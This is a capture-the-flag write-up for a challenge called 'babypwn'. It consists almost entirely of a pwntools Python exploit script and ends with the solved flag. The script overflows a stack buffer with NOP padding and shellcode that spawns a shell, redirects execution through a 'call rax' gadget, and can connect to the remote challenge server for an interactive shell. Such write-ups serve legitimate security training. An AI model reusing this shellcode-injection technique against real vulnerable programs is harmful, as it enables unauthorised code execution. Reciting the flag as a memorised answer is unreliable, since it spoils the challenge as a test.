dplastico

babypwn

a baby:

#!/usr/bin/env python3

from pwn import *

elf = ELF("./main_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''
def start():
    if args.REMOTE:
        return remote("chals.bitskrieg.in", 6001)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

rop = ROP(elf)
callrax = 0x0000000000401014# call rax;
 
payload = b"\x90"*0x10
payload += asm(shellcraft.sh())
payload += b"A"*(0x70-len(payload))
payload += b"BBBBBBBB"
payload += p64(callrax)

sl(payload)

#========= interactive ====================
r.interactive()
#BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205}